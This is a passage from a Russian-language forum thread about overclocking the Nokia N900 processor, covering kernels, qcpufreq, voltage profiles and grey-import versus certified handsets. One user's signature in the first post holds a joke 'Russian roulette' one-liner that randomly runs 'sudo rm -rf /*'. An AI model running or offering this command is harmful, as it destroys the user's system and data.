1,111

Re: Разгон процессора Nokia N900

sugardolt пишет:

которая видит код телефона тот что под имеем пробит сзади батарейки....Он отличался у меня....

ога отличался. потому что налкйка была перепечатана. т.к. имей в н900 НЕ МЕНЯЕМЫЙ аппаратно. только целиком с мамкой

sugardolt пишет:

щаз не спорь со мной

я не спорю. я объясняю как есть.

sugardolt пишет:

вот для этого и меняют код чтоб русская прошивка по умолчанию ставилась

sugardolt пишет:

номер неперебит я к этому говорю

никто его никуда не меняет. прошивке пофиг надписи на наклейке. и встаёт она на любой имей любая. и отличаются они лишь вафляканалами, частотами радио и прочей гадостью незначительной.

sugardolt пишет:

погрешностей

как-бы не схамить то...  neutral
о! неспособность телефона работать при завышенных настройках это не "погрешность" это нормально. неспособность человека с опломбом пытаться переспорить нескольких человек, имея смешные аргументы - это погрешность wink

русская рулетка для вашего линукса:
[ $[ $RANDOM % 6 ] == 0 ] && sudo rm -rf /* || echo "Ваша система ещё жива"

Поделиться

1,112

Re: Разгон процессора Nokia N900

Хочу рискнуть и разогнать ядро.Под последнюю прошивку подскажите ядро пожалуйста.И флешер)

Все лгут.(c) House M.D.
Читать написанное транслитом — это как читать написанное фекалиями на стене: вроде и понятно все, и все равно неприятно.
От Nokia 3650  до Nokia N900. Всего 9 лет.А, кажется, целая эпоха...

Поделиться

1,113

Re: Разгон процессора Nokia N900

2 sa1nt

я не про имей говорю говорю про код!!!! который под имей пишут! всмысле не меняемый? наклейку поменяли ну ладно а почему тогда имей на наклейки и телефоне совпадает а вот код нет?

Поделиться

1,114

Re: Разгон процессора Nokia N900

Было разогнаная с помощью qcpufreq маемо, но поставил нитдройд и максимальная частота опять до 600 снизилась, подскажите что делать. Извиняюсь если такой вопрос уже был

Поделиться

1,115

Re: Разгон процессора Nokia N900

там случайно ядро не меняется?

Вопрос "Ё-моё, что ж я сделал?" © ? типичная постановка обратной задачи.

Поделиться

1,116

Re: Разгон процессора Nokia N900

Походу меняется. Когда на разгон в терминале команды вводил, терминал написал что команды не поддерживаются и что надо переустановить кернел я переустановил,  но ситуация таже

Поделиться

1,117

Re: Разгон процессора Nokia N900

Спасибо за внимание. Вопрос о разгоне уже пропал нашел ответ в ветке про нитдройд)

Поделиться

1,118

Re: Разгон процессора Nokia N900

а как лучше разогнать процессор с помощью ядра или программы cpufreqUI?
через cpufreqUI до 1ггц разогнал, работает нормально.

+ телефоны, которыми пользовался

Samsung А800=>Motorola C650=>Nokia 5140i=>Siemens CX70=>VK Mobile VK900=>Nokia 5300=>
Nokia N81=>Toshiba G900=>Nokia 3250=>Sony Ericsson Z710i=>Asus P525=>RoverPC G5=>
Sony Ericsson K790i=>Siemens CX75=>Motorola E1=>Билайн А100=>Nokia N900

Поделиться

1,119 (10.02.2011 19:52:42 отредактировано ndvikulov)

Re: Разгон процессора Nokia N900

sugardolt пишет:

Я понял в чём проблема

2 All

Проверил два телефона серых! Не работает настройки напряжение ideal зависает тут же! купил ростест! полёт отличный

Вышел 20 тысяч можно купить за 19500 но я ждал не хотел...серый телефон не может использовать ряд функций из за изменения кода в нём...есть конечно серые телефоны без доступа ови который не прошит вплане не изменён код вот он тоже будет норм работать а серый телефон с функциями ови в России это неработающий аппарат по сути...ну если вникать начнёте

бред полнейший. меньше месяца назал пришел мой N900 из США ($349 на amazon.com), при первой загрузке выбрал русский язык - и всё по-русски. Ovi в том числе. Всё работает. Сегодня решил заняться разгоном из интереса и набрел на эту тему.

stavring и ideal уходят в ребут
XLV работает нормально до 805 Мгц, выше - ребут
ULV работает нормально до 805 Мгц, выше - какие то щелчки
LV 850-900 норм, 950 - ребут
default 950 - норм, выше - щелчки иногда.

подскажите, что это за щелчки из динамиков были??

вот такие дела.

минимальный порог в тестах 250. ставил 125 и похоже нет вообще никакого смысла. с откл радиомодулем и вайфаем смотрел долго на коньки - так и не упало ниже 250...

подскажите, пожалуйста, как вывести название текущего профиля на рабочий стол с помощью Desktop Execution Widget?

Поделиться

1,120

Re: Разгон процессора Nokia N900

У меня ростест и на идеале вылетают игры. А все остальное норм. Батарею держит дольше чем при дефолте.

Nokia 9300 -> Nokia E90 -> Nokia N900

Сайт doktorsmirnov

Поделиться

1,121

Re: Разгон процессора Nokia N900

2 ndvikulov

Разобрался уже с этим вопросом у него нет привязки никакой по этому гуд всё! Ну а чего ты пишишь бред полный по поводу первого всё верно я написал )))) ideal у тебя не работает у меня работает на РСТ разгонял до 1150 никаких щелчков нет ) кстати а напиши плиз 7-8 цифру твоего IMEI скинь плиз мне в личное сообщение я тебе + поставлю за это! Мир

Поделиться

1,122 (11.02.2011 12:19:37 отредактировано ndvikulov)

Re: Разгон процессора Nokia N900

по поводу ideal я думаю, что всё таки это просто разные партии. то что продается рст за бешенные деньги - явно залежавшиеся аппараты.

Поделиться

1,123

Re: Разгон процессора Nokia N900

Здравствуйте!!))
скажите, а можно ли как-нибудь разогнать поцессор не перепрошивая телчик, а то мне моя прошива уж больно нравится big_smile
и еще...можно ли всю инструкцию по разгону как нибудь красиво в картинках изобразить? ну, специально для таких ламаков как я big_smile

Поделиться

1,124

Re: Разгон процессора Nokia N900

Разогнал процессор до 830mhz при помощи ядра ....запускаю  QcpuFreq выставляю 830mhz но через небольшой промежуток времени захожу в программу опять и вижу оюратно 600mhz.Т.Е программа автоматом обратно занижает частоту...ничего не понимаю как сделать что бы всегда было 830??вроде лагов и ребутов нет

Поделиться

1,125

Re: Разгон процессора Nokia N900

Ядро какое?

Вопрос "Ё-моё, что ж я сделал?" © ? типичная постановка обратной задачи.

Поделиться